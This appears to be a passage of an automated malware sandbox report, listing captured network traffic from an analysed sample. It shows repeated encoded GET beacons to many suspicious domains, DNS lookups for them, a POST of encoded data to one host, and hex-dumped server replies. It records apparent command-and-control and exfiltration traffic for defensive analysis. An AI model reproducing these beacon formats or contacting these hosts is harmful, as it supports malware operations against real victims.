          Source: global trafficHTTP traffic detected: GET /ou1g/?mnYxMt=p6P+FgoGiP/G4Ng3oYlXbImlMlvFFtomc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4jq6HSjjn+IbLc0VRvScSlPe00C22kG27m5w2cAUdRcq5A==&TTd=yRNPZBU8fZA HTTP/1.1Host: www.multileveltravel.worldAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /xqel/?TTd=yRNPZBU8fZA&mnYxMt=vvqDHEJ83RQMdUhg1EKNs//bEg71XT6q1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Ki9HalpMd1Ir/+EzHBu1DH6h7lGA7WG3xqwFFB+pHyvvKg== HTTP/1.1Host: www.40wxd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /rhgo/?mnYxMt=1xwwfRv/EtrSMau9mvfnqZyv+rHmSC/oq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tCPQXm9YsirdLDRzA3cfwD9qJJnnuO9mn3dTqKhTCwV4Aw==&TTd=yRNPZBU8fZA HTTP/1.1Host: www.vasehub.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /jp2s/?TTd=yRNPZBU8fZA&mnYxMt=P0qG7QiazDWD2BWfpofH/Z3c5n3R/ut+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4weE+MfzEO7kysrfh1XHRqn8s8FFNRzB3KWFDa4Bz8OGfyA== HTTP/1.1Host: www.coffee-and-blends.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzKmUGNgGAEHlgTmn1kSmBKemMzzmn4XCXnVEaEKQ/eq21A==&TTd=yRNPZBU8fZA HTTP/1.1Host: www.tmstore.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /xia9/?TTd=yRNPZBU8fZA&mnYxMt=6Fbp2c2euLl3IpV0Sl4p6qZBCOQHPcn3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JTmoB07JhO43d4HdqVa/yMKia/c5OjSLq43HtsiZpZ7nyQ== HTTP/1.1Host: www.softillery.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /moqb/?TTd=yRNPZBU8fZA&mnYxMt=5S0MhnNpk6MkkLalRnUZdzXeRbBtBDflj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsQmQr2N8nNBPzMWj0VDcmFp5Ede8h+DqCqOrnQWhCDltJQ== HTTP/1.1Host: www.nad5.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /esft/?mnYxMt=mVI2MUxphHC6Uw3exRyeaSUO625HWiZjnHyqF3bL23emPksaKYEAojmfDw0HEL3vY5GLDWVdtCqn7MAr+1mql2O8Aqc8K+kCLQXJA3QmiA5LkgCXPGJmunOEg2Q+Wwqggw==&TTd=yRNPZBU8fZA HTTP/1.1Host: www.luxe.guruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /frw6/?mnYxMt=UG3twl1RTWICP6a/gHNO8KHNMAUFMYd04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRyja311ZOzbuI/6XNArj8rsZzk05Ib+oXtNARvJ557jq8EQ==&TTd=yRNPZBU8fZA HTTP/1.1Host: www.digitalbloom.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HK3o+HppIUB4jPHNr8oJc0/dyFD8r5IhzQkmiC+XTwnzrQ==&TTd=yRNPZBU8fZA HTTP/1.1Host: www.amitayush.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /d5je/?mnYxMt=joFU07nwohD6eVof7LEAc8A6AvX4Xdan1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iBltimhMIjfcvDspXx4VIdueoAIlFt6Qc63ge1Cxn5PIrg==&TTd=yRNPZBU8fZA HTTP/1.1Host: www.moritynomxd.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /h8b0/?mnYxMt=DRMewQ2K/nAxApdBv9ra6bsCdKq6L6XhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpgUg2JSERF0UkR4bqmVQDFHy6vjAN9/CTn0QkHjb1AS2LQ==&TTd=yRNPZBU8fZA HTTP/1.1Host: www.tukaari.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /s7e8/?TTd=yRNPZBU8fZA&mnYxMt=Qf5nKOHOS6pOo2hrLtSm+ampCv+PHNIpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneDowc/gh6rYJzY7Er9+/8bJZT8eqOHKV6gTsddlCzKVbHQ== HTTP/1.1Host: www.specialgift.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficDNS traffic detected: DNS query: www.specialgift.asia
          Source: global trafficDNS traffic detected: DNS query: www.filelabel.info
          Source: global trafficDNS traffic detected: DNS query: www.longfilsalphonse.net
          Source: global trafficDNS traffic detected: DNS query: www.multileveltravel.world
          Source: global trafficDNS traffic detected: DNS query: www.40wxd.top
          Source: global trafficDNS traffic detected: DNS query: www.vasehub.xyz
          Source: global trafficDNS traffic detected: DNS query: www.coffee-and-blends.info
          Source: global trafficDNS traffic detected: DNS query: www.tmstore.click
          Source: global trafficDNS traffic detected: DNS query: www.softillery.info
          Source: global trafficDNS traffic detected: DNS query: www.gemtastic.shop
          Source: global trafficDNS traffic detected: DNS query: www.nad5.shop
          Source: global trafficDNS traffic detected: DNS query: www.luxe.guru
          Source: global trafficDNS traffic detected: DNS query: www.digitalbloom.info
          Source: global trafficDNS traffic detected: DNS query: www.amitayush.digital
          Source: global trafficDNS traffic detected: DNS query: www.moritynomxd.xyz
          Source: global trafficDNS traffic detected: DNS query: www.tukaari.shop
          Source: unknownHTTP traffic detected: POST /lclg/ HTTP/1.1Host: www.filelabel.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.filelabel.infoReferer: http://www.filelabel.info/lclg/Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 207User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)Data Raw: 6d 6e 59 78 4d 74 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 2f 72 32 30 6b 4c 6f 57 52 4c 6d 7a 37 4b 4c 6c 66 47 69 68 6c 70 57 6f 78 67 5a 57 4d 76 77 67 7a 6d 38 39 66 47 75 51 6f 51 66 72 72 69 4d 73 4a 51 45 46 6c 58 7a 45 65 43 68 46 6c 5a 48 37 63 37 35 75 4d 48 4c 38 46 30 75 44 6e 41 73 4f 75 66 4b 66 66 72 6d 57 62 77 61 4a 50 70 77 6a 45 61 55 58 52 67 74 30 6e 5a 39 73 51 59 46 58 4e 53 4f 48 41 76 56 39 35 6c 62 42 72 46 77 66 4d 50 79 74 71 77 50 4e 31 37 77 37 51 6b 49 67 49 73 56 2b 52 69 45 33 67 6e 37 44 50 51 72 4e 79 4f 4f 4a 7a 75 6f 7a 62 30 7a 54 38 78 32 49 67 77 75 76 58 50 35 59 56 49 3d Data Ascii: mnYxMt=nElwp91d2c4kZ/r20kLoWRLmz7KLlfGihlpWoxgZWMvwgzm89fGuQoQfrriMsJQEFlXzEeChFlZH7c75uMHL8F0uDnAsOufKffrmWbwaJPpwjEaUXRgt0nZ9sQYFXNSOHAvV95lbBrFwfMPytqwPN17w7QkIgIsV+RiE3gn7DPQrNyOOJzuozb0zT8x2IgwuvXP5YVI=
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 12 Nov 2024 17:33:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 2088Connection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Request-Id: 618a2981cf5a603a1e340252859201b1X-Runtime: 0.014474Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 79 6c 65 73 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 37 5d 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 77 69 64 65 20 7b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 36 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 2f 2f 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e 6c 3d 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 61 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 20 20 20 20 20 20 6d 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 6f 29 5b 30 5d 3b 61 2e 61 73 79 6e 63 3d 31 3b 61 2e 73 72 63 3d 67 3b 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 6d 29 0a 20 20 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 0a 20 20 20 20 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 17:34:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 17:34:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 17:34:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 17:34:42 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 